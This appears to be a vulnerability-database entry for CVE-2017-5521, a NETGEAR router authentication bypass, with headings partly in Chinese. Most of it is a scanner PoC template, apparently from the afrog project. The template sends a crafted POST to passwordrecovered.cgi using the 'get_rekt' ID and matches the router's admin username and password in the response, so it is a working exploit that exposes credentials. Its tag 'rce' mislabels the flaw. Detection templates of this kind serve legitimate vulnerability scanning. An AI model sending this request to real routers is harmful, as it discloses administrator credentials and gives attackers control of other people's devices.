CVE-2017-5521: Bypassing Authentication on NETGEAR Routers

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

NETGEAR routers before 6.0.10 allow remote attackers to bypass authentication and gain access to the router's administrative interface by using the get_rekt ID.

PoC代码[已公开]

id: CVE-2017-5521

info:
  name: Bypassing Authentication on NETGEAR Routers
  author: betta
  severity: high
  description: |-
    NETGEAR routers before 6.0.10 allow remote attackers to bypass authentication and gain access to the router's administrative interface by using the get_rekt ID.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
  tags: cve,cve2017,netgear,rce
  created: 2023/07/13

rules:
  r0:
    request:
      method: POST
      path: /passwordrecovered.cgi?id=get_rekt
    expression: response.status == 200 && "right\">Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2017/CVE-2017-5521.yaml